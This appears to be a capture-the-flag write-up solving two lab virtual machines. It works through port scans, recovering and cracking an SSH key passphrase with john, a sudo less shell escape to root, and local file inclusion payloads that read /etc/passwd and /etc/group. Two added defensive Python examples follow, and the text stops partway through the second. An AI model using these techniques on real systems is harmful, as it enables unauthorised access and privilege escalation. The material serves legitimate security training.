UQ Cyber Squad 0x01 Intro to Linux, Machines, and Networking


Introduction

Found the UQ Cyber Squad site at https://cybersquad.uqcloud.net/index.html. Signed up for their CTF on https://ctf.uqcloud.net/

0x01 Introduction to Linux

This was identical to the QUT Whitehats Week 2 for challenges 1 through to 8. The writeup was already done at https://kush.com.fj/blog/posts/2020-02-28_qut_wh_wk2/.

No place like index.html - 10pts

There are no clues or hints for this, but it was pretty obvious.

  • Navigated to https://cybersquad.uqcloud.net/index.html
  • Manually reviewed the page source and searched for flag
  • Found flag on line #30 of the source
  • Submitted: flag{w0ah_n1c3_f1nd}

Machines

The machines challenges were named machines because they provided virtual machines for a traditional boot-to-root.

Snoop [USER] - 50pts

Using the knowledge you’ve gained from our meetups (and some of your own research), your task is to collect the user flag, then escalate to root and collect the system’s flag.

Format: flag{user}

Download link: https://cybersquad.uqcloud.net/machines/Snoop.ova

  • Downloaded the ova file
  • Set up a DHCP server on the internal network named intnet so that the VMs can obtain leases
  • "c:\Program Files\Oracle\VirtualBox\VBoxManage.exe" dhcpserver add --netname intnet --ip 172.16.254.254 --netmask 255.255.255.0 --lowerip 172.16.254.100 --upperip 172.16.254.199 --enable
  • Imported the ova and changed the networking to connect to the intnet Internal Network
  • Connected one interface of my ParrotOS Sec VM to the Internal Network as well
  • Booted up both VMs
  • Ran sudo netdiscover -i eth1 -r 172.16.254.0/24 to identify the target; found the DHCP server at 172.16.254.254 and the target at 172.16.254.104
  • Ran a port scan using nmap to identify open ports: nmap -n -v -A -p- 172.16.254.104
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
| http-robots.txt: 2 disallowed entries 
|_/rabbits/ /creds4snoopsite/ 
|_http-server-header: nginx/1.14.2
|_http-title: SNOOP DOGG's personal shop
8297/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1a:db:6e:32:42:9a:59:8c:7c:be:19:68:10:b8:cd:6e (RSA)
|   256 63:65:ff:75:dd:98:86:73:b7:4c:bf:9a:44:05:12:9e (ECDSA)
|_  256 43:88:ee:96:5d:50:8e:cf:20:b6:13:b9:e4:85:be:15 (ED25519)
9830/tcp open  http    nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Navigated to http://172.16.254.104/rabbits/ and received an HTTP 403 response. The page most likely requires some form of authentication, if it is not forbidden for some other reason (refer to https://tools.ietf.org/html/rfc7231#section-6.5.3)
  • Navigated to http://172.16.254.104/creds4snoopsite/ and found a username and password
curl -v http://172.16.254.104/creds4snoopsite/
*   Trying 172.16.254.104:80...
* TCP_NODELAY set
* Connected to 172.16.254.104 (172.16.254.104) port 80 (#0)
> GET /creds4snoopsite/ HTTP/1.1
> Host: 172.16.254.104
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.2
< Date: Fri, 20 Mar 2020 23:03:27 GMT
< Content-Type: text/html
< Content-Length: 145
< Last-Modified: Fri, 13 Mar 2020 16:10:04 GMT
< Connection: keep-alive
< ETag: "5e6bb05c-91"
< Accept-Ranges: bytes
< 
Snoop's manager keeps forgetting his passwords - gotta put them somewhere he'll remember...<br><br>

user: richard<br>
password: igottupacmybags
* Connection #0 to host 172.16.254.104 left intact
  • Attempted to authenticate using the credentials to the /rabbits/ site
    • curl -v --user richard:igottupacmybags http://172.16.254.104/rabbits/
    • curl -v --digest --user richard:igottupacmybags http://172.16.254.104/rabbits/
    • curl -v --anyauth --user richard:igottupacmybags http://172.16.254.104/rabbits/
  • Eventually gave up and remembered that there is another site listening on port 9830 which returned a 401 (refer to https://tools.ietf.org/html/rfc7235#section-3.1); since a 401 explicitly signals that authentication is required, that site is the more likely home for these credentials
  • Attempted to authenticate to the site on port 9830 and had success
curl -v --user richard:igottupacmybags http://172.16.254.104:9830
*   Trying 172.16.254.104:9830...
* TCP_NODELAY set
* Connected to 172.16.254.104 (172.16.254.104) port 9830 (#0)
* Server auth using Basic with user 'richard'
> GET / HTTP/1.1
> Host: 172.16.254.104:9830
> Authorization: Basic cmljaGFyZDppZ290dHVwYWNteWJhZ3M=
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.2
< Date: Fri, 20 Mar 2020 23:19:16 GMT
< Content-Type: text/html
< Content-Length: 4651
< Last-Modified: Sun, 15 Mar 2020 15:28:01 GMT
< Connection: keep-alive
< ETag: "5e6e4981-122b"
< Accept-Ranges: bytes
< 
Hello there<br><br>

Here's that thing we talked about richard... If snoop finds out he'll toast me, and not in the way he normally toasts things<br><br>

  • Placed the Base64 encoded string in a file called 9830-base64.txt
  • Decoded the Base64 encoded string and found an RSA private key
base64 -d < 9830-base64.txt 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,F182044617CE352060253885B0E0D4DF

-----END RSA PRIVATE KEY-----
  • Repeated the process and redirected the output into a file called ssh-key
  • The header of the RSA key indicates that it is encrypted with a passphrase, so we need the passphrase before we can use the SSH key
head -4 ssh-key.pri 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,F182044617CE352060253885B0E0D4DF

  • Extracted the encryption type, salt value and encrypted key material from the SSH key into john's hash format: /usr/share/john/ssh2john.py ssh-key > ssh-key.hash
  • Attempt to find a passphrase for the SSH key
/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ssh-key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
crip4life        (ssh-key.pri)
1g 0:00:00:36 DONE (2020-03-20 19:34) 0.02740g/s 393030p/s 393030c/s 393030C/sa6_123..*7¡Vamos!
Session completed
  • We find that the passphrase is crip4life
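As an added example (not part of the original writeup), a small Python checker that tells apart the key formats behind john's "KDF/cipher" cost line above: legacy PEM encryption, announced by the "Proc-Type: 4,ENCRYPTED" and "DEK-Info" headers, derives the cipher key from the passphrase with a single MD5 pass, whereas the openssh-key-v1 format records a bcrypt KDF and its round count. Only the two header lines are taken from the key above; every sample key body is constructed placeholder data.

```python
"""Audit how an SSH private key file is (or is not) passphrase-protected.

Added example, not from the original writeup. Legacy PEM keys mark encryption
with "Proc-Type: 4,ENCRYPTED" and "DEK-Info: <cipher>,<iv>"; OpenSSL derives
the cipher key from the passphrase with one MD5 pass (EVP_BytesToKey), which
is john's "0=MD5/AES" cost and why it tried ~393k passphrases per second.
"""
import base64
import re
import struct

PEM_RE = re.compile(
    r"-----BEGIN ([A-Z ]+?) PRIVATE KEY-----\n(.*?)-----END \1 PRIVATE KEY-----",
    re.S,
)


def _read_string(buf, offset):
    """Read one SSH wire-format string: uint32 big-endian length, then bytes."""
    (length,) = struct.unpack_from(">I", buf, offset)
    offset += 4
    return buf[offset:offset + length], offset + length


def _openssh_v1(body_b64):
    """Parse the cipher/KDF header fields of an openssh-key-v1 blob."""
    blob = base64.b64decode("".join(body_b64.split()))
    magic = b"openssh-key-v1\0"
    if not blob.startswith(magic):
        raise ValueError("not an openssh-key-v1 blob")
    cipher, off = _read_string(blob, len(magic))
    kdf, off = _read_string(blob, off)
    kdfopts, off = _read_string(blob, off)
    info = {"format": "openssh-v1", "encrypted": kdf != b"none",
            "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": None}
    if kdf == b"bcrypt":
        # kdfoptions = string salt, uint32 rounds (ssh-keygen default is 16)
        _salt, pos = _read_string(kdfopts, 0)
        (info["rounds"],) = struct.unpack_from(">I", kdfopts, pos)
    return info


def _legacy_pem(label, body):
    """Parse the RFC 1421-style headers at the top of a legacy PEM body."""
    headers = {}
    for line in body.splitlines():
        if not line.strip() or ":" not in line:
            break  # a blank line ends the header block; base64 has no ':'
        key, value = line.split(":", 1)
        headers[key.strip()] = value.strip()
    info = {"format": f"legacy-pem ({label})", "encrypted": False,
            "cipher": None, "kdf": None, "rounds": None}
    if headers.get("Proc-Type") == "4,ENCRYPTED" and "DEK-Info" in headers:
        cipher, _, iv = headers["DEK-Info"].partition(",")
        info.update(encrypted=True, cipher=cipher, iv=iv,
                    kdf="EVP_BytesToKey(MD5)", rounds=1)
    return info


def audit_key(pem_text):
    """Return a dict describing the key's format and passphrase protection."""
    match = PEM_RE.search(pem_text)
    if not match:
        raise ValueError("no PEM private key found")
    label, body = match.group(1), match.group(2)
    return _openssh_v1(body) if label == "OPENSSH" else _legacy_pem(label, body)


def risk(info):
    """One-line verdict for a key-hygiene report."""
    if not info["encrypted"]:
        return "HIGH: private key stored without a passphrase"
    if info["format"].startswith("legacy-pem"):
        return "MEDIUM: legacy PEM encryption, one MD5 pass per guess"
    return f"LOW: {info['kdf']} KDF with {info['rounds']} rounds"


# Constructed samples. Header lines come from the key recovered above; the
# base64 body is a placeholder string, not key material.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,F182044617CE352060253885B0E0D4DF

Y29uc3RydWN0ZWQgcGxhY2Vob2xkZXIsIG5vdCBhIHJlYWwga2V5
-----END RSA PRIVATE KEY-----
"""
LEGACY_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
Y29uc3RydWN0ZWQgcGxhY2Vob2xkZXIsIG5vdCBhIHJlYWwga2V5
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(data):
    return struct.pack(">I", len(data)) + data


def build_openssh_v1_header(cipher, kdf, rounds):
    """Construct only the header fields of an openssh-key-v1 file (test data);
    the key sections that follow in a real file are omitted, since the audit
    never reads past the KDF options."""
    kdfopts = _ssh_string(b"\0" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = (b"openssh-key-v1\0" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack(">I", 1))  # number of keys = 1
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"
```

Converting a legacy key to the bcrypt-protected format is a one-liner with ssh-keygen -p -o -f <key>, and the checker above will then report it as LOW.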
  • We can now use the SSH key to connect to the server on port 8297 and grab the user flag
ssh -i ssh-key richard@172.16.254.104 -p 8297
The authenticity of host '[172.16.254.104]:8297 ([172.16.254.104]:8297)' can't be established.
ECDSA key fingerprint is SHA256:ppY8Sx1xhBzSPYfbF5i91Aa1Hy5xiBaYT6iCzbuEbkM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[172.16.254.104]:8297' (ECDSA) to the list of known hosts.
Enter passphrase for key 'ssh-key': 
Linux snoop 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 15 13:02:01 2020 from 192.168.1.112
richard@snoop:~$ uname -a
Linux snoop 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
richard@snoop:~$ hostname
snoop
richard@snoop:~$ id
uid=1000(richard) gid=1000(richard) groups=1000(richard),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
richard@snoop:~$ ls -las
total 44
4 drwxr-xr-x 3 richard richard 4096 Mar 14 10:36 .
4 drwxr-xr-x 3 root    root    4096 Mar 14 00:09 ..
4 -rw------- 1 richard richard  803 Mar 16 01:27 .bash_history
4 -rw-r--r-- 1 richard richard  220 Mar 14 00:09 .bash_logout
4 -rw-r--r-- 1 richard richard 3526 Mar 14 00:09 .bashrc
4 -rw------- 1 root    richard   38 Mar 14 02:03 .lesshst
4 -rwxr-xr-x 1 richard richard  208 Mar 14 02:06 list_clients.sh
4 -rw-r--r-- 1 richard richard  807 Mar 14 00:09 .profile
4 drwxr-xr-x 2 richard richard 4096 Mar 16 01:27 .ssh
4 -rw-r--r-- 1 root    root      28 Mar 14 10:36 user.txt
4 -rw------- 1 richard richard 3730 Mar 14 02:06 .viminfo
richard@snoop:~$ cat user.txt
flag{v3ry_s3cur3_4s51st4nt}
  • Submitted: flag{v3ry_s3cur3_4s51st4nt}

Snoop [ROOT] - 60pts

Now own the machine!

Format: flag{root}

Download link: https://cybersquad.uqcloud.net/machines/Snoop.ova

  • Whilst logged in as richard we enumerate the files in his home directory
  • We find list_clients.sh
cat list_clients.sh 
#!/bin/bash

echo "This script prints out a list of snoop's 'clients'"
echo "It is sensitive information - only for your eyes"
echo "List of clients:"
/usr/bin/sudo /usr/bin/less /root/clients | /usr/bin/cat
  • Although the richard account is able to run commands via sudo, we do not have his password, and his sudo privileges may be restricted to running a single command
  • From past experience we know that less can run shell commands, so we run the sudo command manually and, once inside less, use ! to escape to a shell
/usr/bin/sudo /usr/bin/less /root/clients
1. Two packs
2. 60 Cents
3. mnms
4. hot square
5. The passive S.M.A.L.L
6. Nas-server
!bash
root@snoop:/home/richard# id
uid=0(root) gid=0(root) groups=0(root)
root@snoop:/home/richard# pwd
/home/richard
root@snoop:/home/richard# cd /root
root@snoop:~# ls -las
total 44
4 drwx------  3 root root 4096 Mar 16 01:28 .
4 drwxr-xr-x 18 root root 4096 Mar 14 00:07 ..
8 -rw-------  1 root root 4275 Mar 14 08:42 .bash_history
4 -rw-r--r--  1 root root  596 Mar 14 00:49 .bashrc
4 -rw-r--r--  1 root root   86 Mar 14 09:06 clients
4 -rw-r--r--  1 root root   27 Mar 14 10:35 flag.txt
4 -rw-------  1 root root   52 Mar 14 02:06 .lesshst
4 drwxr-xr-x  3 root root 4096 Mar 14 01:59 .local
4 -rw-r--r--  1 root root  148 Aug 18  2015 .profile
0 -rw-------  1 root root    0 Mar 16 01:28 .viminfo
4 -rw-r--r--  1 root root  176 Mar 14 09:42 .wget-hsts
root@snoop:~# cat flag.txt
flag{sn0op_l0v3s_ku5hi0ns}
  • Submitted: flag{sn0op_l0v3s_ku5hi0ns}

Inclusiveness - 100pts

Download the box from http://deadbeef-uq.ddns.net/Inclusiveness.ova

Become a user and then root the machine to find the flag!

  • Downloaded the ova file
  • Imported into Virtualbox
  • Connected to Internal Network intnet and booted up
  • Discovered target using netdiscover at 172.16.254.103
  • Performed an nmap port scan: nmap -n -v -A -p- 172.16.254.103
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 20:10 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating NSE at 20:10
Completed NSE at 20:10, 0.00s elapsed
Initiating Ping Scan at 20:10
Scanning 172.16.254.103 [2 ports]
Completed Ping Scan at 20:10, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 20:10
Scanning 172.16.254.103 [65535 ports]
Discovered open port 80/tcp on 172.16.254.103
Discovered open port 22/tcp on 172.16.254.103
Discovered open port 21/tcp on 172.16.254.103
Completed Connect Scan at 20:11, 18.51s elapsed (65535 total ports)
Initiating Service scan at 20:11
Scanning 3 services on 172.16.254.103
Completed Service scan at 20:11, 6.19s elapsed (3 services on 1 host)
NSE: Script scanning 172.16.254.103.
Initiating NSE at 20:11
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 20:11, 1.19s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.04s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.01s elapsed
Nmap scan report for 172.16.254.103
Host is up (0.0017s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Feb 08 21:51 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.16.254.100
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
|   256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_  256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Initiating NSE at 20:11
Completed NSE at 20:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.36 seconds
  • Found three open ports 21 (FTP), 22 (SSH) and 80 (HTTP)
  • Could not find any known exploits against the services using searchsploit
  • The web site appears to be the default Apache site on a Debian host, so I decided to try enumerating directories using gobuster: gobuster dir -u http://172.16.254.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 2>&1 > gobuster.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://172.16.254.103
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/20 22:08:50 Starting gobuster
===============================================================
/manual (Status: 301)
/javascript (Status: 301)
/robots-txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/03/20 22:10:41 Finished
===============================================================
  • Attempted to get the robots-txt file even though this does not seem to be the standard robots.txt file
curl -v http://172.16.254.103/robots-txt
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /robots-txt HTTP/1.1
> Host: 172.16.254.103
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 02:24:04 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: User-Agent
< Last-Modified: Sat, 08 Feb 2020 03:40:29 GMT
< ETag: "3b-59e084481655e"
< Accept-Ranges: bytes
< Content-Length: 59
< Content-Type: text/html
< 
You are not a search engine! You can't read my robots.txt!
* Connection #0 to host 172.16.254.103 left intact
  • Retried with curl, spoofing the User-Agent header to look like a search engine: curl -v -A Googlebot http://172.16.254.103/robots-txt
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /robots-txt HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 404 Not Found
< Date: Sat, 21 Mar 2020 02:25:21 GMT
< Server: Apache/2.4.38 (Debian)
< Content-Length: 276
< Content-Type: text/html; charset=iso-8859-1
< 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 172.16.254.103 Port 80</address>
</body></html>
* Connection #0 to host 172.16.254.103 left intact
  • Attempted to get the standard robots.txt with the spoofed agent: curl -v -A Googlebot http://172.16.254.103/robots.txt
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /robots.txt HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 02:28:47 GMT
< Server: Apache/2.4.38 (Debian)
< Last-Modified: Sat, 08 Feb 2020 03:26:11 GMT
< ETag: "2d-59e08115bb1ef"
< Accept-Ranges: bytes
< Content-Length: 45
< Content-Type: text/plain
< 
User-agent: *
Disallow: /secret_information/
* Connection #0 to host 172.16.254.103 left intact
  • Found: /secret_information/
  • Attempted to access the directory
curl -v -A Googlebot http://172.16.254.103/secret_information/
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/ HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 02:31:07 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 1477
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

DNS Zone transfer is the process where a DNS server passes a copy of part of it's database (which is called a "zone") to another DNS server. It's how you can have more than one DNS server able to answer queries about a particular zone; there is a Master DNS server, and one or more Slave DNS servers, and the slaves ask the master for a copy of the records for that zone.

A basic DNS Zone Transfer Attack isn't very fancy: you just pretend you are a slave and ask the master for a copy of the zone records. And it sends you them; DNS is one of those really old-school Internet protocols that was designed when everyone on the Internet literally knew everyone else's name and address, and so servers trusted each other implicitly.

It's worth stopping zone transfer attacks, as a copy of your DNS zone may reveal a lot of topological information about your internal network. In particular, if someone plans to subvert your DNS, by poisoning or spoofing it, for example, they'll find having a copy of the real data very useful.

So best practice is to restrict Zone transfers. At the bare minimum, you tell the master what the IP addresses of the slaves are and not to transfer to anyone else. In more sophisticated set-ups, you sign the transfers. So the more sophisticated zone transfer attacks try and get round these controls.




* Connection #0 to host 172.16.254.103 left intact
  • Manual review of the two HTML anchor tags suggests that the language files en.php and es.php are included by index.php via the lang parameter, so there may be a file inclusion vulnerability here. Tried to confirm local file inclusion (LFI) using curl -v -A Googlebot http://172.16.254.103/secret_information/?lang=../../../../../../../etc/passwd
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/?lang=../../../../../../../etc/passwd HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 02:44:11 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 2191
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi-autoipd:x:107:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:114:121::/var/lib/saned:/usr/sbin/nologin
colord:x:115:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:116:123::/var/lib/geoclue:/usr/sbin/nologin
tom:x:1000:1000:Tom,,,:/home/tom:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ftp:x:118:125:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin



* Connection #0 to host 172.16.254.103 left intact
  • Found: account named tom
  • Found: account for ftp has home directory as /srv/ftp
  • Decided to grab a copy of the /etc/group file as well
curl -v -A Googlebot http://172.16.254.103/secret_information/?lang=../../../../../../../etc/group
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/?lang=../../../../../../../etc/group HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 07:32:59 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 1009
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:tom
floppy:x:25:tom
tape:x:26:
sudo:x:27:
audio:x:29:tom
dip:x:30:tom
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:tom
sasl:x:45:
plugdev:x:46:tom
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
input:x:105:
kvm:x:106:
render:x:107:
crontab:x:108:
netdev:x:109:tom
messagebus:x:110:
tss:x:111:
bluetooth:x:112:tom
ssl-cert:x:113:
avahi-autoipd:x:114:
rtkit:x:115:
ssh:x:116:
scanner:x:117:saned,tom
avahi:x:120:
saned:x:121:
colord:x:122:
geoclue:x:123:
tom:x:1000:
systemd-coredump:x:999:
ftp:x:125:



* Connection #0 to host 172.16.254.103 left intact
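As an added example from the defender's side (not part of the original writeup), a Python scanner that picks the ?lang= traversal requests above out of Apache access logs, including percent-encoded and double-encoded variants, and also flags any lang value that is not one of the two files the page actually links to. The log lines are constructed to mirror the session above; the allow-list and watched path are assumptions based on the page's own links.

```python
"""Flag local-file-inclusion attempts against /secret_information/ in Apache logs.

Added example, not from the original writeup. The page includes whatever
file ?lang= names, so the only legitimate values are the two linked language
files; anything else, and in particular directory traversal (plain or
percent-encoded), is worth an alert. All log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
WATCHED_PATH = "/secret_information/"
ALLOWED_LANGS = {"en.php", "es.php"}   # the only values the page links to (assumed allow-list)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (%252e -> %2e -> .) until it stops changing."""
    for _ in range(max_rounds):
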